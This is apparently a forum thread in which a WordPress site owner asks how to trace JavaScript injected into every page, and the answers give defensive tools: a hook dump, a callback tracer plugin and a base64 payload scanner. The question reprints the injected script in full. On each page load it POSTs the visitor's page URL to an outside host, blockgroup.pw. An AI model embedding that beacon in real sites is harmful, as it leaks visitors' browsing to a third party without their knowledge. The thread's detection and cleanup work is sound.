
How do I figure out where inserted (possibly malicious) JavaScript code is coming from

Suddenly I have noticed that all my pages contain some unexpected JavaScript code.

I don't check the source code every day, but today I needed to debug something and then I saw this code in all my pages.

I am using WordPress Multisite version 4.1.2.

All plugins on the site are from wordpress.org, with the latest updates.

The question is: how can I find out where the code (from which file) is coming from? I have searched all the files using Notepad++ and did not find this code in any file!

<script type="text/javascript" >
    var idPin = "";
    // Beacon: on every page load, POST the URL of the page the visitor is on
    // to a third-party host. The response is never read, so the cross-origin
    // request still goes out: a form-encoded POST is a "simple" request that
    // the browser sends without a CORS preflight.
    function postTest(idPin) {
        var xmlhttp;
        if (window.XMLHttpRequest) { xmlhttp=new XMLHttpRequest(); }
        else { xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); }   // legacy IE fallback
        var baseLocation = encodeURIComponent(document.URL);
        var req = "http://blockgroup.pw/testpost";                  // attacker-controlled endpoint
        d = "url=" + baseLocation + "&geo=" + idPin;                // 'd' is an undeclared global, as posted
        xmlhttp.open("POST", req ,true);

        xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
        xmlhttp.send(d);
    }
    window.onload = function() { postTest(idPin); }
</script>

You could try a couple of things, since WordPress uses hooks to call the respective parts. You could output them all and search for something related to this in the footer section.

A.

-- functions.php --

// Dump every registered hook (or one named hook) with its priorities and callback ids.
// In WordPress 4.1.2, $wp_filter[$tag] is an array keyed by priority; each entry is
// keyed by the callback id (a function name, or spl_object_hash() for objects/closures).
function list_hooked_functions($tag = false) {
    global $wp_filter;
    if ($tag) {
        $hook[$tag] = isset($wp_filter[$tag]) ? $wp_filter[$tag] : null;
        if (!is_array($hook[$tag])) {
            trigger_error("Nothing found for '$tag' hook", E_USER_WARNING);
            return;
        }
    } else {
        $hook = $wp_filter;
        ksort($hook);
    }
    echo '<pre>';
    foreach ($hook as $tag => $priorities) {
        echo "<br />&gt;&gt;&gt;&gt;&gt;\t<strong>$tag</strong><br />";
        ksort($priorities);
        foreach ($priorities as $priority => $functions) {
            echo $priority;
            foreach ($functions as $name => $properties) {
                echo "\t$name<br />";
            }
        }
    }
    echo '</pre>';
    return;
}

list_hooked_functions();

I assume, since it's JS, that it will hook onto the wp_print_footer_scripts sequence. You can then go up the chain of calls and filter for the specific function outputting the script.

https://developer.wordpress.org/reference/

to understand the structure of the functions involved.

B.

Another thing: if the hacker managed to get access to the database, searching for the related script in the database could find it (though I doubt it).

C.

See if you use any vulnerable code in your theme, such as a gallery plugin incorporated inside the theme (which doesn't get updated), as opposed to those installed via the admin panel.

To be noted: often they will use a base64 string on which they then call decode, so you won't be able to find the JS code as plain text.

RevSlider had a vulnerability not too long ago.

D.

Use a security plugin such as Wordfence, which can scan your files for suspicious code.

https://wordpress.org/plugins/wordfence

Once you find and remove the malicious code, please make sure to change your passwords.

--- Additional Information ---

There seems to be a lot going on in the WordPress realm, and it pretty much affects a lot of sites if you are using the WordPress comment box.

Current versions of WordPress are vulnerable to a stored XSS. An unauthenticated attacker can inject JavaScript in WordPress comments. The script is triggered when the comment is viewed. (27 April 2015)

Source: http://klikki.fi/adv/wordpress2.html

-- Please let us know if you get any lead with any of the above.
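The hook dump in step A lists which callbacks are attached to wp_footer and friends, but it does not tell you which of them actually writes the <script> block, and calling it from functions.php only shows hooks registered before the theme loaded. The must-use plugin below is an added example, not code from the answer above: it waits until template_redirect, wraps every callback on the hooks that normally emit script tags, buffers each callback's output, and logs the file and line of any callback whose output contains the indicator. The indicator is the domain from the injected script on this page; the hook list, the log format and the WP_Hook branch for WordPress 4.7+ are assumptions (the question names 4.1.2, where $wp_filter[$tag] is a plain array).

```php
<?php
/*
 * Plugin Name: Footer Script Tracer (added example, not from the original post)
 * Drop this file into wp-content/mu-plugins/ on a staging copy of the site and
 * load any front-end page. Findings go to error_log(), so with WP_DEBUG_LOG
 * enabled they appear in wp-content/debug.log.
 */

// Domain taken from the injected script. The hooks to inspect are an assumption.
define('FST_INDICATOR', 'blockgroup.pw');
define('FST_HOOKS', 'wp_head,wp_print_scripts,wp_footer,wp_print_footer_scripts');

// Resolve a callable to "file:line" so the offending code can be opened directly.
function fst_describe_callback($cb) {
    try {
        if ($cb instanceof Closure || (is_string($cb) && function_exists($cb))) {
            $r = new ReflectionFunction($cb);
        } elseif (is_array($cb) && count($cb) === 2) {
            $r = new ReflectionMethod($cb[0], $cb[1]);       // [object|class, method]
        } elseif (is_string($cb) && strpos($cb, '::') !== false) {
            $r = new ReflectionMethod($cb);                   // 'Class::method'
        } else {
            return 'unresolvable callable: ' . var_export($cb, true);
        }
        return $r->getFileName() . ':' . $r->getStartLine();
    } catch (ReflectionException $e) {
        return 'reflection failed: ' . $e->getMessage();
    }
}

// Replace $entry['function'] with a closure that buffers the original callback.
function fst_wrap_entry(array &$entry, $tag, $priority) {
    $orig  = $entry['function'];
    $where = fst_describe_callback($orig);
    $entry['function'] = function () use ($orig, $tag, $priority, $where) {
        ob_start();
        $ret = call_user_func_array($orig, func_get_args());
        $out = ob_get_clean();
        if (stripos($out, FST_INDICATOR) !== false) {
            error_log(sprintf('[fst] "%s" emitted by %s (hook %s, priority %d)',
                FST_INDICATOR, $where, $tag, $priority));
        }
        echo $out;              // re-emit so the rendered page is unchanged
        return $ret;
    };
}

function fst_install_wrappers() {
    global $wp_filter;
    foreach (explode(',', FST_HOOKS) as $tag) {
        if (empty($wp_filter[$tag])) {
            continue;
        }
        // WP 4.1.2: $wp_filter[$tag][$priority][$id] = ['function' => ..., 'accepted_args' => ...]
        // WP 4.7+ (assumption): the same array lives in $wp_filter[$tag]->callbacks (WP_Hook)
        if (is_object($wp_filter[$tag]) && isset($wp_filter[$tag]->callbacks)) {
            $callbacks = &$wp_filter[$tag]->callbacks;
        } else {
            $callbacks = &$wp_filter[$tag];
        }
        foreach ($callbacks as $priority => &$entries) {
            foreach ($entries as &$entry) {
                if (isset($entry['function'])) {
                    fst_wrap_entry($entry, $tag, $priority);
                }
            }
            unset($entry);
        }
        unset($entries, $callbacks);
    }
}

// Plugins and the active theme have registered their hooks by template_redirect.
add_action('template_redirect', 'fst_install_wrappers', PHP_INT_MAX);
```

Because core attaches wp_print_footer_scripts to wp_footer, a hit inside the footer is logged twice; the deepest file:line is the one to open. If that line is core's own _wp_footer_scripts in wp-includes/script-loader.php, the payload was registered through the script queue rather than printed directly, so dump $wp_scripts->registered next. If nothing is logged at all while the script still appears, the injection is not coming from a hook callback: look at the theme's template files, at modified core files, at a PHP auto_prepend_file, and at the web server layer.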
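Point C explains why the questioner's Notepad++ search found nothing: a payload stored as base64 (often further gzinflate'd or rot13'd) never contains the domain as plain text. The command-line scanner below is an added example, not code from the answer or from WordPress: it walks an install, decodes every long base64 literal in PHP and JS files through the common layers, and reports the file and line whenever the decoded text contains the indicator. It also flags auto_prepend_file directives in .htaccess, .user.ini and php.ini, since those load code before WordPress runs and would not show up in any hook listing. The indicator is the domain from the injected script; the decoder layers, the 40-character threshold and the file set are assumptions.

```php
<?php
// scan-encoded.php (added example, not from the original post)
// Usage: php scan-encoded.php /var/www/html

const INDICATORS  = ['blockgroup.pw'];   // domain from the injected script
const MIN_LITERAL = 40;                  // shorter base64 runs are rarely worth decoding (assumption)

// Decode one literal through the layers attackers commonly stack.
function decode_layers($literal) {
    $raw = base64_decode($literal, true);
    if ($raw === false) {
        return [];
    }
    $layers = ['base64' => $raw, 'base64+rot13' => str_rot13($raw)];
    $inflated = @gzinflate($raw);
    if ($inflated !== false) {
        $layers['base64+gzinflate'] = $inflated;
    }
    $uncompressed = @gzuncompress($raw);
    if ($uncompressed !== false) {
        $layers['base64+gzuncompress'] = $uncompressed;
    }
    return $layers;
}

// Return [line, reason] pairs for one file.
function scan_file($path, array $indicators) {
    $findings = [];
    $base  = basename($path);
    $lines = @file($path);
    if ($lines === false) {
        return $findings;
    }
    $pattern = '/[A-Za-z0-9+\/]{' . MIN_LITERAL . ',}={0,2}/';
    foreach ($lines as $i => $line) {
        $no = $i + 1;
        // These files can make PHP include a script before WordPress even starts.
        if (in_array($base, ['.htaccess', '.user.ini', 'php.ini'], true)
            && stripos($line, 'auto_prepend_file') !== false) {
            $findings[] = [$no, 'auto_prepend_file directive'];
        }
        if (preg_match_all($pattern, $line, $m) === 0) {
            continue;
        }
        foreach ($m[0] as $literal) {
            foreach (decode_layers($literal) as $layer => $decoded) {
                foreach ($indicators as $ind) {
                    if (stripos($decoded, $ind) !== false) {
                        $findings[] = [$no, "$layer literal decodes to text containing '$ind'"];
                    }
                }
            }
        }
    }
    return $findings;
}

// Recurse through the tree; returns path => findings for files with hits only.
function scan_tree($root, array $indicators) {
    $report = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $file) {
        $name = $file->getFilename();
        $ext  = strtolower($file->getExtension());
        if (!in_array($ext, ['php', 'phtml', 'inc', 'js'], true)
            && !in_array($name, ['.htaccess', '.user.ini', 'php.ini'], true)) {
            continue;
        }
        $hits = scan_file($file->getPathname(), $indicators);
        if ($hits) {
            $report[$file->getPathname()] = $hits;
        }
    }
    return $report;
}

if (PHP_SAPI === 'cli' && isset($argv[1])) {
    foreach (scan_tree($argv[1], INDICATORS) as $path => $hits) {
        foreach ($hits as list($line, $why)) {
            printf("%s:%d  %s\n", $path, $line, $why);
        }
    }
}
```

A legitimate plugin that embeds an image as base64 produces no report line, because only literals that decode to something containing the indicator are printed. The scanner does not cover hex-escaped strings ("\x62\x6c..."), chr()-concatenation, or payloads stored in the database (wp_options, wp_posts, wp_postmeta), so the same indicator search should also be run against the database, as point B suggests.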
